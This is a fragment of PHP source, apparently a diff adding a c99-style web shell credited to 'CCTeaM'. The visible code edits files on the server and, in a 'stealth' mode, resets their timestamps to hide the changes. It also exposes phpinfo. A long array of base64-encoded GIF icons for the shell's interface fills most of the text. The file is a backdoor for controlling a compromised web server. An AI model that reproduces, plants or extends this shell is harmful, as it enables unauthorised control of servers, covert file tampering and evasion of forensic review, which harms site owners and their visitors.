    "; + } + else + { + @ob_clean(); + $ext = explode($f,"."); + $ext = $ext[count($ext)-1]; + header("Content-type: image/gif"); + echo($r); + exit; + } + } + elseif ($ft == "edit") + { + if (!empty($submit)) + { + if ($filestealth) {$stat = stat($d.$f);} + $fp = fopen($d.$f,"w"); + if (!$fp) {echo "Can't write to file!";} + else + { + echo "Saved!"; + fwrite($fp,$nfcontent); + fclose($fp); + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + $r = $nfcontent; + } + } + $rows = count(explode(" +",$r)); + if ($rows < 10) {$rows = 10;} + if ($rows > 30) {$rows = 30;} + echo "
      
    "; + } + elseif (!empty($ft)) {echo "
    Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.
    ";} + else {echo "
    Unknown extension (".$ext."), please, select type manually.
    ";} + } +} +if ($act == "phpinfo") +{ + ob_end_clean(); + phpinfo(); + exit; +} +} $data = base64_decode("PGNlbnRlcj48Yj5DcmVkaXRzOjxicj5JZGVhIGFuZCBjb2RpbmcgYnkgdHJpc3RyYW1bQ0NUZWFNXS48YnI+QmV0YS10ZXN0aW5nIGFuZCBzb21lIHRpcHMgLSBOdWtMZW9OIFtBblRpU2hAUmUgdEVhTV0uPC9iPjwvY2VudGVyPiDA4vLu8CDi+/Dg5uDl8iDh6+Dj7uTg8O3u8fL8IO7k7e7s8yDv8O7i8yDq7vLu8PvpIO7y6uv+9+jrIOXj7iDt4CDs5fH/9iDu8iDo7eXy4Cwg5OXr7iDh++vuIOLl9+Xw7uwg6CDk5evg8vwg4fvr7iDt5ffl4+4gOykgz+7k8u7r6u3z6+Ag6iDt4O/o8eDt6P4g8erz6uAg6CDs7v8g7/Do8O7k7eD/IOvl7fwgOik8Y2VudGVyPjxiPs/w4OLo6+A8L2I+OjwvY2VudGVyPiA8Yj7C+yDs7ubl8uUg6Ofs5e3/8vwg7/Du4/Dg7OzzIO/uIMLg+OXs8yDz8ezu8vDl7ej+LCDs5e3/8vwg7eDx8vDu6eroLCDk6Ofg6e0uLi4g7e4g5fHr6CDC+ywg8+Lg5uDl7PvpLCDz5". "ODr6PLlIOjr6CDy5ewg4e7r5eUg6Ofs5e3o8uUg6u7v6PDg6fL7LCDy7iD/IOHz5PMg4vvt8+bk5e0g7vLu8OLg8vwg4uDsIP/p9uAuIDwvYj48YnI+wOLy7vAg7eUg7eXxuPIg7vLi5fLx8uLl7e3u8fLoIOfgIOLu5+zu5u376SDi8OXkIO3g7eXt5e376SD98u7pIO/w7uPw4Ozs7uksIPIu6i4g7u3gIO/w5eTu8fLg4uvl7eAg8u7r/OruIOTr/yDu5+3g6u7s6+Xt6P8u"); +if ($act == "img") +{ + @ob_clean(); + + $arrimg = array( +"arrow_ltr"=> +"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". +"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", +"back"=> +"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". +"Wg0JADs=", +"buffer"=> +"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". +"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". +"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", +"change"=> +"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". +"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". +"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". +"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". +"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". +"zMshADs=", +"delete"=> +"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". +"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". +"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". +"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". +"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". +"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". +"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". +"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". +"jwVFHBgiEGQFIgQasYkcSbJQIAA7", +"download"=> +"R0lGODlhDwAQAJECAAAAAP///////wAAACH5BAEAAAIALAAAAAAPABAAQAIslI8pAOH/WGoQqMOC". +"vAtqxIReuC1UZHGLapAhdzqpEn9Y7Wlplpc3ynqxWAUAOw==", +"edit"=> +"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". +"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". +"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", +"forward"=> +"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". +"WqsJADs=", +"home"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". +"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". +"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", +"mode"=> +"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". +"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". +"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", +"refresh"=> +"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". +"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". +"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". +"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", +"search"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". +"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". +"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". +"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". +"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", +"setup"=> +"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". +"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". +"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". +"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", +"small_dir"=> +"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". +"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", +"small_unk"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". +"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". +"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". +"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". +"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". +"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". +"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". +"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". +"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". +"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". +"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". +"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". +"yAsokBkQADs=", +"sort_asc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". +"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", +"sort_desc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". +"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", +"sql_button_drop"=> +"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". +"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". +"AQEAOw==", +"sql_button_empty"=> +"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". +"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", +"sql_button_insert"=> +"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". +"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", +"up"=> +"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". +"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". +"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", +"write"=> +"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". +"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". +"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", +"ext_ani"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAP/////MmczMmf/MzJmZZszMzP//zAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARbEMmJAKC4XhCKvRhABJZgACY4oSR3HmdFcQLndaVK7ziu". +"VQRBYBAI1IKWYrLIJBhwrBqzOHKCotMRcaCbBrRDz+pLHQ65IWOZKE4Lz+hM5SAcDNoZwOBAINxV". +"EQA7", +"ext_asp"=> +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". +"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". +"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", +"ext_au"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_avi"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". +"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". +"PYXCyg+V2i44XeRmSfYqsGhAAgA7", +"ext_bat"=> +"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". +"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". +"dmrYAMn1onq/YKpjvEgAADs=", +"ext_bin"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAgv///wAAAICAgMDAwICAAP//AAAAAAAAAANJ". +"aLLc9lCASecQ8MlKB8ARRwVkEIqdqU0EEXCDqkxB4VZxSBTB8lqyTSD2+eVWE0lP8DrORgMiwLkZ". +"/aZBVOqkpUa/4KisRC6rEgA7", +"ext_bmp"=> +"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA". +"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q". +"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3". +"EzWCgwARADs=", +"ext_cat"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg4CAgAAAAMDAwP///wAA/wAAgACAAAD/AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARdEMk5gQU0IyuOMUV1XYf3ESEgrCwQnGgQAENdjwCBFjO7". +"Xj9AaYbjFArBme1mKeiQLpWvqdMJosXB1akKbGxSzvXqVXEGNKDAuyGq0NqriyJTW2QaRP3Ozktk". +"fRQRADs=", +"ext_cgi"=> +"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". +"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". +"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". +"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". +"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". +"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". +"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". +"RYtMAgEAOw==", +"ext_cmd"=> +"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". +"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". +"dmrYAMn1onq/YKpjvEgAADs=", +"ext_cnf"=> +"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgAAA/wD//wAAAANK". +"CLqs9weESSuAMZQSiPfBBUlVIJyo8EhbJ5TTRVJvM8gaR9TGRtyZSm1T+OFau87HGKQNnlBgA5Cq". +"Yh4vWOz6ikZFoynjSi6byQkAOw==", +"ext_com"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAgv///wAAAICAgMDAwICAAP//AAAAAAAAAANJ". +"aLLc9lCASecQ8MlKB8ARRwVkEIqdqU0EEXCDqkxB4VZxSBTB8lqyTSD2+eVWE0lP8DrORgMiwLkZ". +"/aZBVOqkpUa/4KisRC6rEgA7", +"ext_cov"=> +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". +"/////ywAAAAAEAAQAAAEUxDJKY+9Fr3ND/JV9lASAHCV9mHPybXay7kb4LUmILWziOiPwaB1IH5i". +"uMVCaLGBRhOT0pQBri6mQEL3Q8py0ZwYTLE5b6Aw9lw+Y6glN2Ytt0QAADs=", +"ext_cpc"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAP///wCAAMDAwAAAgP//AICAgICAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARYEIlJK0VYmDE294YAZEMQFCZ6DiJpBsNRmuwoDephHGqd". +"GanYLBCyCYavYOsWIDQJUKePeXr1lprmM1ooklRJGrbkjEJhY7B6qvlwOh+sZb5EAO74PB4RAQA7", +"ext_cpl"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAgv///wAAAICAgMDAwICAAP//AAAAAAAAAANJ". +"aLLc9lCASecQ8MlKB8ARRwVkEIqdqU0EEXCDqkxB4VZxSBTB8lqyTSD2+eVWE0lP8DrORgMiwLkZ". +"/aZBVOqkpUa/4KisRC6rEgA7", +"ext_cpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". +"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". +"Eq7YrLDE7a4SADs=", +"ext_crl"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAP///wCAAMDAwAAAgP//AICAgICAAAAA". 